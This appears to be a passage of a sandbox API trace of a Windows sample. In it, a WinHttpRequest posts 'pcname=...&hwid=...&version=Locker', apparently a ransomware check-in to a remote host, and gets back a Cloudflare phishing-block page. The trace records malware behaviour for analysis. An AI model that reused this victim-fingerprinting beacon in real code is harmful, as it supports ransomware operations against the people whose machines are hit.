(This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x7, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x8, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.937] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.937] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0x9, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.938] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.938] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xa, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.938] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.938] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xb, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.938] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.938] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xc, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.938] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.938] ITypeInfo:RemoteGetFuncDesc (in: This=0xe15994, index=0xd, ppFuncDesc=0x8befac, pDummy=0x356310 | out: ppFuncDesc=0x8befac, pDummy=0x356310*=0x3225e4) returned 0x0 [0247.938] ITypeInfo:LocalReleaseTypeAttr (This=0xe15994) returned 0xdc6698 [0247.938] ITypeInfo:LocalReleaseFuncDesc (This=0xe15994) returned 0xdef238 [0247.938] WinHttpRequest:IUnknown:Release (This=0xe15994) returned 0x1 [0247.938] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x24) returned 0xe08aa8 [0247.938] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x8bf0a0*(rgvarg=([0]=0xe08aac*(varType=0x8, wReserved1=0xe0, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=uHzLtcIRwiRtkBPp4CFREqX&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=([0]=0xe08aac*(varType=0x8, wReserved1=0xe0, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=uHzLtcIRwiRtkBPp4CFREqX&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0248.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0248.078] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd990d0 [0248.078] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991a8 [0248.078] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5018 [0248.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc22880 | out: hHeap=0xbe0000) returned 1 [0248.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21928 | out: hHeap=0xbe0000) returned 1 [0248.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa648 | out: hHeap=0xbe0000) returned 1 [0248.078] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa648 [0248.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc41200 [0248.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21928 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe08aa8 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0248.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd990d0 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa078 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218c8 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991a8 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5018 | out: hHeap=0xbe0000) returned 1 [0248.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.079] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5018 [0248.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5038 [0248.080] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fd8 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd010d0 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1a) returned 0xe032a0 [0248.080] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xc26c30, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x8befb8*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x8bf0bc | out: rgDispId=0x8bf0bc*=9) returned 0x0 [0248.080] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe032a0 | out: hHeap=0xbe0000) returned 1 [0248.080] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xe40af0 [0248.080] WinHttpRequest:IDispatch:Invoke (in: This=0xc26c30, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x8bf0a0*(rgvarg=0xe40af4, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x8bf088, pExcepInfo=0x8bf068, puArgErr=0x8bf0b0 | out: pDispParams=0x8bf0a0*(rgvarg=0xe40af4, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x8bf088*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xcf91a8), pExcepInfo=0x8bf068*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x8bf0b0*=0x2b5995) returned 0x0 [0248.085] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd010d0 | out: hHeap=0xbe0000) returned 1 [0248.085] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1fb0) returned 0xe6abc0 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fa8 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40af0 | out: hHeap=0xbe0000) returned 1 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fd8 | out: hHeap=0xbe0000) returned 1 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991c0 | out: hHeap=0xbe0000) returned 1 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5018 | out: hHeap=0xbe0000) returned 1 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5018 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991c0 | out: hHeap=0xbe0000) returned 1 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03430 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd991c0 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd98f20 [0248.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.086] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03458 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfb620 [0248.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5038 [0248.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd98f08 [0248.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xd98f38 [0248.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5038 [0248.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0248.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xfd2) returned 0xe66c58 [0248.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xe66c58, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0248.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd98f38 | out: hHeap=0xbe0000) returned 1 [0248.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xfe0) returned 0xe6cb78 [0248.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe66c58 | out: hHeap=0xbe0000) returned 1 [0248.087] GetLastError () returned 0x0 [0248.087] SetLastError (dwErrCode=0x0) [0248.087] GetLastError () returned 0x0 [0248.087] SetLastError (dwErrCode=0x0) [0248.087] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc23ff8, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x8bd9c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x8bd9c0, lpOverlapped=0x0) returned 0 [0248.087] GetLastError () returned 0x6 [0248.088] GetLastError () returned 0x6 [0248.088] SetLastError (dwErrCode=0x6) [0248.088] GetLastError () returned 0x6 [0248.088] SetLastError (dwErrCode=0x6) [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe6cb78 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd98f08 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfb620 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03458 | out: hHeap=0xbe0000) returned 1 [0248.088] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b0d8 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc41200 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21928 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa648 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9c40 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218f8 | out: hHeap=0xbe0000) returned 1 [0248.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e050 | out: hHeap=0xbe0000) returned 1 [0248.088] WinHttpRequest:IUnknown:Release (This=0xc26c30) returned 0x0 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b120 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b50 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21968 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e258 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b88 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bc8 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6a8 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ac0 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9dc0 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa600 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bf8 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9e08 | out: hHeap=0xbe0000) returned 1 [0248.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa618 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b20 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b048 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff388 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6f0 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa708 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e190 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b78 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e078 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe6abc0 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fa8 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd98f20 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd991c0 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03430 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5018 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9df0 | out: hHeap=0xbe0000) returned 1 [0248.091] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5018 [0248.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0248.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9df0 [0248.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda4fa8 [0248.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa708 [0248.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fa8 | out: hHeap=0xbe0000) returned 1 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x16) returned 0xd010b0 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fa8 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4ff8 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03430 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5038 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x44) returned 0xe11918 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4c) returned 0xdec0f8 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03368 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fd8 [0248.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe031b0 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9ad8 [0248.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03430 | out: hHeap=0xbe0000) returned 1 [0248.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6f0 | out: hHeap=0xbe0000) returned 1 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03430 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5038 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03160 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b20 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5048 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa618 [0248.093] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9e08 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fe8 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bf8 [0248.093] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa600 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 